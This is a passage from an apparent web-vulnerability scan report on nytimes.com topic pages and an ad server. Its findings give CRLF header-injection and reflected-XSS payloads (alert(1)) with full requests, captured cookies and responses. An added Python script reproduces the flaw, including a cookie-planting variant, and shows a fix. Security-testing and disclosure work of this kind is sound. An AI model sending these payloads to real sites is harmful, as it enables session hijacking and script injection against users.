Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/9c59a
76e21e137a4
/timestopics/people/m/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.73. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload bb56f%0d%0a3e3182b0228 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/bb56f%0d%0a3e3182b0228/people/m/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/bb56f
3e3182b0228
/people/m/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.74. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 416d4%0d%0a59dfc04082f was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/416d4%0d%0a59dfc04082f/m/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/416d4
59dfc04082f
/m/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.75. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload 105b9%0d%0a853f313a162 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/people/105b9%0d%0a853f313a162/madonna/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/people/105b9
853f313a162
/madonna/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.76. http://topics.nytimes.com/top/reference/timestopics/people/m/madonna/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/people/m/madonna/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload c3f03%0d%0ae6b0f96142d was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/people/m/c3f03%0d%0ae6b0f96142d/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:41:02 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/people/m/c3f03
e6b0f96142d
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.77. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 919c2%0d%0ada221e78489 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/919c2%0d%0ada221e78489/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/919c2
da221e78489
/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.78. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 22697%0d%0afed4a746118 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/reference/22697%0d%0afed4a746118/subjects/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/22697
fed4a746118
/subjects/o/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.79. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 4 is copied into the Location response header. The payload 30fc6%0d%0ad1ceed21046 was submitted in the REST URL parameter 4. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/30fc6%0d%0ad1ceed21046/o/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/30fc6
d1ceed21046
/o/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.80. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 5 is copied into the Location response header. The payload ae3e4%0d%0aa980ea2e2c8 was submitted in the REST URL parameter 5. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/subjects/ae3e4%0d%0aa980ea2e2c8/oil_spills/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/subjects/ae3e4
a980ea2e2c8
/oil_spills/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.81. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 6 is copied into the Location response header. The payload 2d948%0d%0a63790b1a5b0 was submitted in the REST URL parameter 6. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/subjects/o/2d948%0d%0a63790b1a5b0/gulf_of_mexico_2010/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/2d948
63790b1a5b0
/gulf_of_mexico_2010/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.82. http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/ [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/reference/timestopics/subjects/o/oil_spills/gulf_of_mexico_2010/

Issue detail

The value of REST URL parameter 7 is copied into the Location response header. The payload 4e69e%0d%0a3e883c89cca was submitted in the REST URL parameter 7. This caused a response containing an injected HTTP header.

Request

GET /top/reference/timestopics/subjects/o/oil_spills/4e69e%0d%0a3e883c89cca/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616247804:ss=1289616226962; adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:1; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; __utmz=69104142.1289606404.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zFN=ABD8ABC3AB810AB0C30A00C03; RMID=00c3216817494cddd04d311a; __utma=69104142.767727384.1289606404.1289606404.1289606404.1; zFD=ABD8ABC3AB810AB0C30A00C03; news_people_toolbar=NO; ups=ABD1gU1d20SA06nv; up=AB8GAb1e20SA09Nj;

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:42:35 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/reference/timestopics/subjects/o/oil_spills/4e69e
3e883c89cca
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>
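The four findings above (2.79 to 2.82) share one root cause: a decoded path segment is copied into the Location header, so a %0d%0a in the request becomes a real CR LF inside the response head and whatever follows it is parsed as a new header line. The following script is an added example, not code from the XSS.CX report or from the site it tested. It reproduces the vulnerable redirect builder and a naive header serialiser, then parses the raw response the way a scanner does: a header line whose name begins with the probe text proves the CR LF was reflected. The hardened builder shows the two fixes a practitioner wants: an allowlist for path segments and percent-encoding of whatever is accepted. The base URL is taken from the report; the allowlist pattern, the segment lists and the cookie-planting variant are assumptions made for the example.

```python
import re
from urllib.parse import quote

# Base of the redirect target seen in issues 2.79-2.82.
BASE = "http://topics.nytimes.com/top/reference/timestopics/"

# Assumed allowlist for one path segment: the real topic paths use only these.
SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_.-]+")


def build_location_vulnerable(segments):
    """Copies every path segment into the Location URL untouched, which is the
    behaviour the report observed: once the server has decoded %0d%0a, the
    CR LF travels into the header as real line-ending bytes."""
    return BASE + "/".join(segments) + "/index.html"


def build_location_hardened(segments):
    """Two layers: reject segments outside the allowlist, then percent-encode
    whatever was accepted so no control character can reach the header."""
    for seg in segments:
        if not SAFE_SEGMENT.fullmatch(seg):
            raise ValueError(f"unsafe path segment: {seg!r}")
    return BASE + "/".join(quote(seg, safe="") for seg in segments) + "/index.html"


def redirect_response(location):
    """Serialises a 301 the way a naive server does: the header value is written
    verbatim, so a CR LF inside it starts a new header line."""
    return ("HTTP/1.1 301 Moved Permanently\r\n"
            f"Location: {location}\r\n"
            "Content-Length: 0\r\n"
            "\r\n")


def parse_headers(raw_response):
    """Split a raw response into (status_line, [(name, value), ...], body).
    A line with no colon is kept with an empty value, which is exactly what an
    injected fragment such as the scanner's probe looks like."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return status, headers, body


def injected_headers(raw_response, probe):
    """Header entries whose name begins with the probe. The probe was sent as
    part of a path value; if it now starts a header name, the CR LF in front
    of it was reflected into the response."""
    _, headers, _ = parse_headers(raw_response)
    return [(name, value) for name, value in headers if name.startswith(probe)]


# Constructed samples: the segments from issue 2.79 after the server has decoded
# %0d%0a, and a weaponised variant that plants a cookie instead of a probe.
SEGMENTS_279 = ["30fc6\r\nd1ceed21046", "o", "oil_spills", "gulf_of_mexico_2010"]
SEGMENTS_COOKIE = ["30fc6\r\nSet-Cookie: sid=attacker", "o", "oil_spills", "gulf_of_mexico_2010"]


def demo():
    """Returns (probe hits, header names of the weaponised response, hardened
    URL for the legitimate path)."""
    vulnerable = redirect_response(build_location_vulnerable(SEGMENTS_279))
    probe_hits = injected_headers(vulnerable, "d1ceed21046")
    _, cookie_headers, _ = parse_headers(redirect_response(build_location_vulnerable(SEGMENTS_COOKIE)))
    legit = build_location_hardened(["subjects", "o", "oil_spills", "gulf_of_mexico_2010"])
    return probe_hits, [name for name, _ in cookie_headers], legit


if __name__ == "__main__":
    hits, names, legit = demo()
    print("probe reflected as header:", hits)
    print("headers in weaponised response:", names)
    print("hardened redirect:", legit)
    try:
        build_location_hardened(SEGMENTS_279)
    except ValueError as err:
        print("hardened builder rejected payload:", err)
```

Two caveats when re-testing a finding like this. First, check the raw bytes on the wire rather than a rendered view: the split Location lines in the report only prove injection if the separator is a real CR LF. Second, the serialiser above is deliberately naive; most current HTTP libraries, Python's http.client among them, refuse to emit a header value that contains CR or LF, so the same reflected value may be harmless behind a different server stack, and the allowlist is still the right fix because it also blocks open-redirect abuse of the copied path.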

3. Cross-site scripting (reflected)
There are 380 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and input that fails validation should be rejected rather than sanitised; and user input should be HTML-encoded at any point where it is copied into application responses, replacing HTML metacharacters such as < > " ' and = with the corresponding HTML entities.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.vulnerable.ad.partner/adj/N3282.nytimes.comSD6440/B3948326.5 [ad parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adj/N3282.nytimes.comSD6440/B3948326.5

Issue detail

The value of the ad request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9b9f'-alert(1)-'8238608c5a5 was submitted in the ad parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3282.nytimes.comSD6440/B3948326.5;p=%99qnz%C8ot;sz=88x31;pc=nyt146056_247966;ord=2010.11.13.01.44.23;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto= HTTP/1.1
Accept: */*
Referer: http://www.nytimes.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c872a402e000091|1044889/607819/14922,2199899/775293/14920,1150992/803637/14920,690333/262595/14920,1782317/604735/14920,2761768/958300/14920|t=1289161520|et=730|cs=_e0c2qc9

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 13 Nov 2010 01:50:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 685

document.write('<a target="_blank" href="http://ad.vulnerable.ad.partner/click;h=v8/3a51/4/123/%2a/u;226379267;0-0;0;50218144;21-88/31;37692415/37710267/1;;~okv=;pc=nyt146056_247966;;~sscs=%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=homepage.nytimes.com/index.html&pos=Middle1C&camp=ING_Direct_2010_02_1474596-nyt1&ad=88x31_SiteSearch_Nov_B3948326.5f9b9f'-alert(1)-'8238608c5a5&sn2=ead05e9b/336cb178&snr=doubleclick&snx=1289611247&sn1=70abef3d/22b41b61&goto=http://save.ingdirect.com/promo/promo_set.asp?p=%99qnz%C8ot&Redirect=19">
...[SNIP]...
